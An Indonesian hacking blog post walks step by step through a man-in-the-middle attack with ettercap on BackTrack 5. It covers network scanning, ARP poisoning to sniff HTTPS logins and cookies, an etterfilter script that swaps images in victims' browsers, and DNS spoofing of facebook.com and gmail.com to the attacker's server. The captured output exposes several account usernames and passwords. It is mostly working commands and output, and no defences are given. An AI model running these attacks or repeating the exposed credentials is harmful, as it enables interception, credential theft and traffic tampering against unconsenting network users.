[++++=== Welcome To My Site Me ===++++]
Tetaplah Berbagi Pengetahuan
Walau Banyak Rintangan Yang Menghadang ,
-::DESCRIPTION
-::DATE
ettercap di backtrack 5
Label:
Hacking
Sebenarnya ini hanyalah update dari postingan saya sebelumnya
.. namun kali ini saya menggunakan Backtrack V dan agak melengkapi
fiture-fiture ettercap. Ettercap biasa di sebut sebagai Swiss Army
Knife, Ettercap sebenarnya merupakan tools yang sering di gunakan untuk
metode penyerangan MITM ( man on the middle attack ). Banyak varian
serangan pada MITM, sebut saja sniffing, spoofing, phissing, cookies
hijacking dan masih banyak lagi. Ok saya deskripsikan percobaan saya.
1. Attacker : backtrack V R1
Ip address :
Link encap:Ethernet HWaddr f4:ec:38:99:60:f3 inet addr:192.168.1.6 Bcast:192.168.1.255 Mask:255.255.255.0 inet6 addr: fe80::f6ec:38ff:fe99:60f3/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:29319 errors:0 dropped:0 overruns:0 frame:0 TX packets:30177 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:17469869 (17.4 MB) TX bytes:6132389 (6.1 MB)2. Target : windows xp ( terinstall pada virtualbox )
Ip address : 192.169.1.14
3. Gateway : 192.168.1.1 ( tp-link modem route )
4. Accesspoint : 192.168.1.50 ( 3com )
Ok lets begin..
Langkah pertama , biasanya attacker akan mengumpulkan target terlebih dahulu. Kali ini saya gunakan nmap
zee@eichel{~}:nmap -sn -n 192.168.1.1/24 Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-01-06 14:29 WIT Nmap scan report for 192.168.1.1 Host is up (0.0076s latency). MAC Address: C8:64:C7:4B:B8:D0 (zte) Nmap scan report for 192.168.1.6 ===> Attacker Host is up. Nmap scan report for 192.168.1.14 ===> Target Host is up (0.0029s latency). MAC Address: 08:00:27:45:C0:C0 (Cadmus Computer Systems) Nmap scan report for 192.168.1.25 Host is up (0.0095s latency). MAC Address: 1C:4B:D6:44:75:9D (AzureWave) Nmap scan report for 192.168.1.50 Host is up (0.014s latency). MAC Address: 00:1E:C1:4C:BF:F6 (3com Europe) Nmap done: 256 IP addresses (5 hosts up) scanned in 2.35 secondsKita coba melihat hasil man dari ettercap , perbiasakan baca.. dengan membaca kita jadi tahu secara detail
ETTERCAP(8) ETTERCAP(8) NAME ettercap NG-0.7.3 - A multipurpose sniffer/content filter for man in the middle attacks ***** IMPORTANT NOTE ****** Since ettercap NG (formerly 0.7.0), all the options have been changed. Even the target specification has been changed. Please read carefully this man page. SYNOPSIS ettercap [OPTIONS] [TARGET1] [TARGET2] TARGET is in the form MAC/IPs/PORTs where IPs and PORTs can be ranges (e.g. /192.168.0.1-30,40,50/20,22,25) DESCRIPTION Ettercap was born as a sniffer for switched LAN (and obviously even "hubbed" ones), but during the development process it has gained more and more features that have changed it to a powerful and flexible tool for man-in-the-middle attacks. It supports active and passive dissec‐ tion of many protocols (even ciphered ones) and includes many features for network and host analysis (such as OS fingerprint). dst...Now what ?
PREPARE :
Jika kita menginginkan serangan sang Swiss Army Knife ini berfungsi dengan baik pada koneksi jaringan aman ssl maka kita harus memastikan bahwa redir_command_on script pada etter.conf aktif. Secara default etter.conf di backtrack linux R1 berada pada direktori
/etc/etter.confUntuk mengaktifkan script tadi , buka file etter.conf dengan editor kesayangan anda kemudian uncomment baris di bawah ini.
# if you use iptables: redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
Dump traffic pada ARP ( sniffing – dump cookies https )
Command : ettercap -T -w dump -i wlan0 -M ARP /xxx.xxx.x.x/ //Keterangan :
1. Dump traffic dan sniffing 2. Syntax T = mode text w = menulis ke sebuah file , dalam contoh ini adalah "dump" i = Interface secara spesifik ( default = eth0 ) M = Tipe attack ( MITM )hasil output :
zee@eichel{~}:ettercap -T -w dump -i wlan0 -M ARP /192.168.1.1/ // ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA Listening on wlan0... (Ethernet) wlan0 -> F4:EC:38:99:60:F3 192.168.1.6 255.255.255.0 Privileges dropped to UID 0 GID 0... 28 plugins 39 protocol dissectors 53 ports monitored 7587 mac vendor fingerprint 1698 tcp OS fingerprint 2183 known services Randomizing 255 hosts for scanning... Scanning the whole netmask for 255 hosts... * |==================================================>| 100.00 % 5 hosts added to the hosts list... ARP poisoning victims: GROUP 1 : 192.168.1.1 C8:64:C7:4B:B8:D0 GROUP 2 : ANY (all the hosts in the list) Starting Unified sniffing... Text only Interface activated... Hit 'h' for inline help Fri Jan 6 15:04:25 2012 TCP 69.171.224.11:443 --> 192.168.1.14:1116 | SA HTTP : 69.171.224.11:443 -> USER: teconhackers@yahoo.com PASS: testes INFO: http://www.facebook.com/ Fri Jan 6 15:04:25 2012 TCP 192.168.1.14:1116 --> 69.171.224.11:443 | P POST /login.php?login_attempt=1 HTTP/1.1. Host: www.facebook.com. User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8. Accept-Language: id,en-us;q=0.7,en;q=0.3. Accept-Encoding: gzip, deflate. Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7. Connection: keep-alive. Referer: http://www.facebook.com/. Cookie: datr=-JSqTtD5bQG1_TZPO4s_w1F0; lu=RAxSgUQ56_3YJisKv_hVcK2w; lsd=5OOOR; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; wd=855x451; act=1325837039360%2F1%3A2; _e_qGyw_0=%5B%22qGyw%22%2C1325837031899%2C%22act%22%2C1325837031895%2C0%2C%22email%22%2C%22click%22%2C%22click%22 %2C%22-%22%2C%22r%22%2C%22%2F%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C648%2C37%2C0%2C838%2C16%5D; _e_qGyw_1=%5B%22qGyw%22%2C1325837039364%2C%22act%22%2C1325837039360%2C1%2C%22pass%22%2C%22click%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2F%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2 Fri Jan 6 15:04:25 2012 TCP 192.168.1.14:1116 --> 69.171.224.11:443 | P C798%2C39%2C0%2C838%2C16%5D. Content-Type: application/x-www-form-urlencoded. Content-Length: 276. . charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94% 2C%D0%84&lsd=5OOOR&locale=id_ID&email=teconhackers%40yahoo.com&pass=testes& default_persistent=0&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C %E6%B0%B4%2C%D0%94%2C%D0%84&lsd=5OOOR&timezone=-270 Fri Jan 6 15:04:31 2012 TCP 69.171.224.11:443 --> 192.168.1.14:1116 | P HTTP/1.1 200 OK. Cache-Control: private, no-cache, no-store, must-revalidate. Expires: Sat, 01 Jan 2000 00:00:00 GMT. P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p". Pragma: no-cache. X-Content-Type-Options: nosniff. X-Frame-Options: DENY. Set-Cookie: _e_qGyw_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly. Set-Cookie: _e_qGyw_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly. Set-Cookie: datr=-JSqTtD5bQG1_TZPO4s_w1F0; expires=Sun, 05-Jan-2014 08:04:30 GMT; path=/; domain=.facebook.com; httponly. Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php%3Flogin_attempt%3D1; path=/; domain=.facebook.com. Set-Cookie: sfiu=AYiQWdMg0NKJJtjnR5tVGVvbNWEMxoG_LiLa0edz4Cl1Dat4VE5lNttqg66Y1AHmjG6eSmP3y8c8Q3UlogKtkOItnAr5I2uMzVEZJEd1HSvnRpbJDnULxFRjPYmUQdI5e8H4LJ2OdkxMMsOvFBT6UeBM; expires=Sun, 05-Feb-2012 08:04:30 GMT; path=/; domain=.facebook.com; httponly. Set-Cookie: wd=deleted; expires=Thu, 01-Ja Fri Jan 6 15:04:31 2012 TCP 69.171.224.11:443 --> 192.168.1.14:1116 | P n-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly. Content-Encoding: gzip. Content-Type: text/html; charset=utf-8. X-FB-Server: 10.54.101.46. X-Cnection: close. Date: Fri, 06 Jan 2012 08:04:30 GMT. Content-Length: 6549. . ...........\[o.Hv~._..f..n......@.d[.l...n.. JdI.E.4/..k`.,. @.......$...$....... 8.6X......H...nOo;.d0.M....:u.....y^.o6..+.....go.?.I.NA64Y2...&*m.vW.T.x^A.l...Yg J..7=..I...Q. .~;."K..7...... Fri Jan 6 15:04:31 2012 TCP 69.171.224.11:443 --> 192.168.1.14:1116 | P .,.7lK.V....Z.k..h......Y.^..K.7..,....../+V.....^...Go.Z.....?..]')..z`H&m..tI.. ....3A..D|. D`.r.....9..LL...8Q...A .N,M.&...6.;. ....0.p....tc.x ..c.....gob....w.-. 192.168.1.14:1116 | P .....YL#...$...lm..+B.:.C...!.Q......n/H .T...".?.kF..>[%e..pH6!.!.`2H.......h.FZ .m.>].|.Y.....3\......G........0.F..e..D......6...(...L.3l .1...|.2,h.Wa.H.*...U. ..6.......'l;..v..v6..=*.(..Fb..aF4.Z......H..,....'yC.....5t.6@u;!......2..+.GD. ...,..3:V..dzp.Q.{.......>.......a.F....L.F.5.v .]..z...86.2.......r....F1.&iB... ...lC.A...X}...m...?..w.5a..Z..P*........1(.....Z...P.=.K. FW6z6F#.&A...g..c.-b....5#d...6%......V` Fri Jan 6 15:04:32 2012 TCP 69.171.224.11:443 --> 192.168.1.14:1116 | P ..4../.\.oJ...6TA...Da.2>.............ou..x...c.b.25z(...^.vYcO7.......pL.....NW4 e.v..Z...'..tNz=.......a@.. .. Up.7.".......8X.4)....%.E...YoB....3.+*..H"|..g.0f .C.%.#h..bv....T...Y.[.;.6.......e_.L.X...Pm`j.h94.C_T...I..!@..4p.....Z.......y. w......f...0...r.......-.i.^..c..o..sL.cz...SD.ZxB.q8..S......../...o|........... 7.....D..ar.....=t.D0aT...... '...}h...g.............].cb@.s.f......V?.M.!8....8. .........a*..8:,...O.._........m.y.8.8...B9..p...*.3.w9.1..5..Lu.F.m...x.*.c.N... .gp.....f7i..#....h.;....k..w..[3...T..r...D.t ..i0..X!...,o.^ 192.168.1.14:1116 | P r.p..9=?.\...UMst...l............e.H.y..3.i.. .K.;b..T...Q..|..'H..?.....j{..AKj.-y......P...J....J.......y#..^.hnia=.[.....e.. e,...%.&..R.f....V..4..Ds..}..5(.....?(.f..=.........Z.T......;..\....3.%........n ...rn.}.T9X._...S.X].....;-..\6.'+..|w5.s.[......F.j.h.X).j..[j.~.H..Jo...@.\...O. .\......=G...p3....ll.gr.F . 192.168.1.14:1116 | P I...Q2..v.#.....:.4..wro.....Gh..&B. .C.../.FD...n.xG..!V`.ny..hN....?tD..2.;..h. p........6.ob......^.T.R......=...M.ma.D.s..ui...T4.....D.}..:c............g@].. vW.^X...^...."...h&. ..VZ.0.>.;...mB.....\._.c.........7.".a......_.s|dk.Vp..g.v. .u>."....|.~..T.m..dl.....*.....Xk.....}.t.]..=.....f........#.`w.(5.{..U`.....z. .....0C.....~...}../....}......O~.4....'.Y..U..6.&m..3c:.=.........?.M....'.....d. 3.........s..!. '3.0g..Yv...Z.........\..M...._.....c.....5/......."....W..f.P..7..JC)W..:..a^J.. ...3D..n.G....3 o..'?..Z6@h...p.R............ wtp.........-.f.....T.(.T.y.|.C......\.......;..+..X.H&.....W..V.q"...5.....%.... 9....p.{v....fW}..L...d...G......&..q.)...H....=.C.|..#.v..Zxw.4...CX...$2..?+.h. p6.kH.@ Fri Jan 6 15:04:33 2012 TCP 69.171.224.11:443 --> 192.168.1.14:1116 | P .G.j..C...4..p.sY*K..W.R..?..H..!o.D.G....=.Q..6...I:..%... ...)..."&f"}.%..uM... ..r. .s..............X.. ,.9^.u..fe..1.....G.....U].A..?...C../.J..~.... .......!..D...M$~Oq..OF.........- .t.y.H...,...|....... .F..L.t!1..k`.y....`].>KC..`..%.0,DZ2x..Z...#.5.....D.D.C.. .2.y_..c.x2........[.3.U.....1Y. 192.168.1.14:1116 | P k|&.......egL..Hd3.'s/...Y-...Xb.ic.....MR.~4.v#.......b...U6....E.L..7..6q....T. 1....@.....l"s..U...;e.H....*4.....nk...E\..8) $^ q.uqU~-.........E.{....*..|^... Y..s^...A....9.g..^@....v=.~..^.j....e.N.7TG\d.Q.e".{../......4.7 s .o.6........P...z ........C..g.V.&mg...ZJ.....U....3|_I7a........F0bH...[..........B....+.......M.. CD..E.2.......T.hLY....{!.P........C}.............9...I... ...LaeD.j...^...m..... ....m.......S.5.Z.v..r....).Zm.tX:.......5......C.U..w;.buo.Y......|.x.(.0....... ....O...u..wLN*+sjnu~..,.k.]........A.k..l....s...B....4?.2.O%..I....x..c*..}..n. jw.[..nd."........{X.....B"..*..r...3\...".^L.4.......9..j.C.[.....~v.TP.8.z..z.p . 192.168.1.14:1116 | P .{.."..Fn.fX..I|.......7..J....Z.4.*9t6P..j?O7...).O.:..P.|...ep......h.dg.0..NB? .Qb.D...pM..|...(.....{q...(U......$..t..Y&;&(.ne.0..^..8f......#u.:f.N..-...#.;. .....W...c..1.1.....@......9|....M..B.....t.c..Dx.0..=.. .k../c..6.....S..8.!...A ...V6...(4Qb....$...'fl..........2..$A.............3Q...A.c......(.$..(....%z.... ....?$ R.6.i.......,.m.x..,2P.....\....z.|.=...'...c..R,.......;.....Y9'*7.#E.K.. .i Fri Jan 6 15:04:33 2012 TCP 69.171.224.11:443 --> 192.168.1.14:1116 | P .~.4..f...P.[.......5(...f..YAN0...Rqs/Y9......C..mt....6 .......4.9,U.,..U....[*..3.. ...q.'../.....8A==...XM....R.D.h*7._\._.[.K31....Ze.!$..9...g.T...........C.pe.. ...*...G....'..t..c............]QIH.....I..&J.."[.....D}...!.I.........0.wT. V. .&.....sH.....t..]W.!..a..!.;4.?.....s"..,.5 ..b..oiT.R.gE.....u....X(.U..x..._. gT...._...hP....-.....l.....+... h.iu.(.'.......Y.. .](d......Rny%..!%m.6\.y..pQ ... [.m.c*b%..E...D..Z....Kq|.d..i.#*.Y.\....[...9......eU..b.w\......A....`% .&O.K.. ...$....t.iQ .@... 5...g.L..@.G.1.....QP9..|..q .)..O.dY...d._.._OT...G.. Fri Jan 6 15:04:33 2012 TCP 69.171.224.11:443 --> 192.168.1.14:1116 | RPerhatikan hasil output yang saya tandai ..user name : teconhackers@yahoo.com dan pass : testes , serta cookies yang telah di dump.
METODE SERANGAN ARP POISONING + SNIFFING ATTACK
1. Metode serangan secara menyeluruhYang saya maksudkan dengan metode serangan secara menyeluruh adalah serangan yang menuju kepada seluruh host di bawah satu router ( gateway ).
ettercap -T -q -M ARP // //Sangat tidak di sarankan jika target memiliki jaringan yang besar. Akan membuat komposisi komputer lambat. Mungkin dengan spec hardware yang tinggi kita memiliki kemampuan untuk melakukan metode serangan ini.
Spesifikasi syntax -q = quite mode ( verbose )Kombinasi syntax untuk serangan ke seluruh network
ettercap -T -q -M ARP // //Hasil output :
zee@eichel{~}:ettercap -T -q -i wlan0 -M ARP // // ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA Listening on wlan0... (Ethernet) wlan0 -> F4:EC:38:99:60:F3 192.168.1.6 255.255.255.0 Privileges dropped to UID 0 GID 0... 28 plugins 39 protocol dissectors 53 ports monitored 7587 mac vendor fingerprint 1698 tcp OS fingerprint 2183 known services Randomizing 255 hosts for scanning... Scanning the whole netmask for 255 hosts... * |==================================================>| 100.00 % 5 hosts added to the hosts list... ARP poisoning victims: GROUP 1 : ANY (all the hosts in the list) GROUP 2 : ANY (all the hosts in the list) Starting Unified sniffing... Text only Interface activated... Hit 'h' for inline help HTTP : 69.171.228.13:443 -> USER: teconhackers@yahoo.com PASS: testers INFO: https://www.facebook.com/ HTTP : 66.163.169.186:443 -> USER: niceday PASS: 299281 INFO: https://login.yahoo.com/config/login_verify2?&.src=ym2. Metode serangan terhadap satu spesifik IP
Jika jaringan terlalu besar ada baiknya kita menyerang target ip yang di tentukan. Serangan tersebut di mulai dengan syntax
ettercap -T -q -F ig.ef -M ARP /xxx.xxx.xxx.xxx/ //Sebagai contoh kita menyerang ip target 192.168.1.14
hasil output :
zee@eichel{~}:ettercap -T -q -i wlan0 -M ARP /192.168.1.14/ // ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA Listening on wlan0... (Ethernet) wlan0 -> F4:EC:38:99:60:F3 192.168.1.6 255.255.255.0 Privileges dropped to UID 0 GID 0... 28 plugins 39 protocol dissectors 53 ports monitored 7587 mac vendor fingerprint 1698 tcp OS fingerprint 2183 known services Randomizing 255 hosts for scanning... Scanning the whole netmask for 255 hosts... * |==================================================>| 100.00 % 4 hosts added to the hosts list... ARP poisoning victims: GROUP 1 : 192.168.1.14 08:00:27:45:C0:C0 GROUP 2 : ANY (all the hosts in the list) Starting Unified sniffing... Text only Interface activated... Hit 'h' for inline help HTTP : 72.14.203.84:443 -> USER: zee-eichel@gmail.com PASS: uufjjeiisjau INFO: https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue=http://mail.google.com/mail/&scc=1<mpl=default<mplcache=2
Filter ( have fun with ettercap )
Heheh sekarang kita coba bermain-main dengan ettercap ini dengan menggunakan filter-filter tertentu. Kali ini kita coba filter yang di coding oleh irongeekBerikut ini scriptnya , copas kemudian simpan dengan nama ig.filter kemudian copile script tersebut dengan ettercap
############################################################################ # # # Jolly Pwned -- ig.filter -- filter source file # # # # By Irongeek. based on code from ALoR & NaGA # # Along with some help from Kev and jon.dmml # # http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833 # # # # This program is free software; you can redistribute it and/or modify # # it under the terms of the GNU General Public License as published by # # the Free Software Foundation; either version 2 of the License, or # # (at your option) any later version. # # # ############################################################################ if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.src == 80) { replace("img src=", "http://fbcdn-sphotos-a.akamaihd.net/hphotos-ak-snc7/310716_228831213842949_100001482164189_675549_1767862890_n.jpg\" "); replace("IMG SRC=", "http://fbcdn-sphotos-a.akamaihd.net/hphotos-ak-snc7/310716_228831213842949_100001482164189_675549_1767862890_n.jpg\" "); msg("Filter Ran.\n"); } Compiling : etterfilter [name].filter -o [output].ef zee@eichel{~}:etterfilter ig.filter -o ig.ef etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA 12 protocol tables loaded: DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth 11 constants loaded: VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP Parsing source file 'ig.filter' done. Unfolding the meta-tree done. Converting labels to real offsets done. Writing output to 'ig.ef' done. -> Script encoded into 16 instructions.Penjelasan pada script filter tadi sebenarnya hanya mengganti seluruh gambar yang di buka pada browser korban dengan gambar yang di kehendaki. Untuk menjalankan ettercap dengan script filter tertentu ,
ettercap -T -q -F ig.ef -M ARP // //Jika muncul barisan
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Berarti proses ARP Poisoning sedang berjalan dan berbagai image akan di ganti dengan image yang ditentukan, sehingga tiap kali host target atau jaringan yang telah di racuni akan melihat setiap image yang telah di ganti tersebut pada setiap website yang di bukanya pada browser.
Spoofing Plugin
Spoofing adalah salah satu tehnik MITM yang mengalihkan traffik dari jalur sebenarnya menuju kepada alamat yang di tentukan. Intinya Attacker akan memaksa target menuju pada alamat yang ditentukan attacker menggantikan alamat sebenarnya yang dituju target.Ettercap memiliki plugin untuk melakukan jenis serangan MITM ini.
Lakukan nmap scanning seperti yang sudah saya contohkan di awal artikel ini. Setelah kita telah mendapatkan informasi network pastikan kita mengaktifkan ip forwarding pada mesin attacker.
Untuk mengaktifkan ip forwarding
Linux:
echo 1 > /proc/sys/net/ipv4/ip_forwardBSD:
sysctl -w net.inet.ip.forwarding=1Kemudian config jalur yang akan di spoof nantinya yang di konfigurasikan pada file etter.dns. Lokasi file etter.dns secara default pada backtrack V R1
/usr/local/share/ettercap/etter.dnsUncommand atau ganti baris ini dengan domain yang hendak di spoof ipnya.
facebook.com A 192.168.1.6 *.facebook.com A 192.168.1.6 www.facebook.com PTR 192.168.1.6 # Wildcards in PTR are not allowedEdit ip address dengan ip address pengganti , dalam hal ini saya menggunakan ip address yang di gunakan os backtrack yaitu 192.168.1.6, dan hasilnya akan mengarahkan domain facebook.com dan www.facebook.com ke ip address 192.168.1.6
Syntax ettercap dengan plugin dns_spoof
ettercap -T -q -i wlan0 -P dns_spoof -M ARP // //-P = plugin
saya coba spoof ke gmail.com dengan ip 192.168.1.6
Hasil Output :
Hasil ping pada target host
Perhatikan hasil ping pada host target, ternyata domain www.gmail.com telah di arahkan ( spoofed ) ke 192.168.1.6 Berhubung saya mengaktifkan apache web server ( localhost server ) maka ketika host target membuka gmail.com melalui browser , browser akan membuka halaman localweb saya yang terdapat pada alamat 192.168.1.6
Ok semoga postingan saya ini berguna .. artikel ini akan saya update selanjutnya , kali ini akan saya tambahkan cara menanggal serangan-serangan seperti ini.
Source : Om Zee
Diposting oleh ethical code di 20.03
Langganan:
Posting Komentar (Atom)
0 komentar:
Posting Komentar